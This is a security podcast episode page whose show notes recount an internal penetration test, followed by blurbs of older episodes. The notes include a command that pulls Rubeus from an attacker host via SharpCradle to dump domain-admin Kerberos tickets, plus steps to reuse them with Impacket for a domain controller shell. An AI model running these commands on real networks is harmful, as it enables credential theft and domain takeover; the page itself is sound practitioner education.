7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
7 Minute Security19 Nov 2020

7MS #442: Tales of Internal Network Pentest Pwnage - Part 23

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

  • Great blue team tools alerting our customer to a lot of the stuff we were doing
  • An EDR that we tried to beat up (but it beat us up instead)
  • SharpGPOAbuse which we talked about extensively last week
  • Separation of "everyday" accounts from privileged accounts
  • Multi-factor authentication bypass!
  • Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb

Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight.

We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

Episoder(696)

7MS #48: So I Gave My Eight Year Old a Computer (audio)

7MS #48: So I Gave My Eight Year Old a Computer (audio)

Is it a good idea to give young kids a computer to play with? Maybe. Maybe not. Tune in to today’s episode and weigh in! 7MS #48: So I Gave My Eight Year Old a Computer (audio)

21 Mar 20158min

7MS #47: Logging and Alerting RELOADED (audio)

7MS #47: Logging and Alerting RELOADED (audio)

Hey, you should log the stuff going on in your network. This episode talks about that (again). And I reference some AD-related settings that may not be enabled in your environment…stuff you might want to turn on. Check out that information via this PDF here. 7MS #47: Logging and Alerting Reloaded (audio)

17 Mar 20157min

7MS #46: So You Want to be a Hacker? (audio)

7MS #46: So You Want to be a Hacker? (audio)

So you want to be a hacker? Cool. In this episode I toss myself under the bus and share why I used to have a really dumb perspective on what that meant, and how my view of hackers – and hacking – has changed (and hopefully matured). 7MS #46: So You Want to be a…

14 Mar 20157min

7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

Warning, this is an off topic episode! I used to pirate software. There. I admitted it. But it’s funny how a letter from the Comcast legal dept. will change your mind and let you see piracy in a whole new light! 7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

10 Mar 20157min

7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

Warning, this is an off topic episode! Did you know it’s fun to stay at the YMCA? Did you also know it’s fun to annoy annoying people at the YMCA? Listen to this episode to find out why. 7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

7 Mar 20157min

7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

Did you know that Web site vulnerability scanners can destroy your customer sites? If not, listen to this. 7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

28 Feb 20157min

7MS #42: Vulnerability Scans vs. Pentests (audio)

7MS #42: Vulnerability Scans vs. Pentests (audio)

I think everybody throws around the terms “vulnerability scans” and “pentests” and they mean completely different things from one person to the next. In this episode I try to clarify the differences and distinctions (in my mind, anyways). 7MS #42: Vulnerability Scans vs. Pentests (audio)

14 Feb 20157min

7MS #41: OSCP – Part 7 (audio)

7MS #41: OSCP – Part 7 (audio)

Tried of talking about OSCP yet? Me neither! 7MS #41: OSCP – Part 7 (audio)

6 Feb 20156min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
forklart
popradet
aftenpodden-usa
stopp-verden
fotballpodden-2
nokon-ma-ga
dine-penger-pengeradet
det-store-bildet
frokostshowet-pa-p5
rss-ness
rss-penger-polser-og-politikk
aftenbla-bla
e24-podden
bt-dokumentar-2
rss-gukild-johaug
unitedno
rss-dannet-uten-piano
rss-borsmorgen-okonominyhetene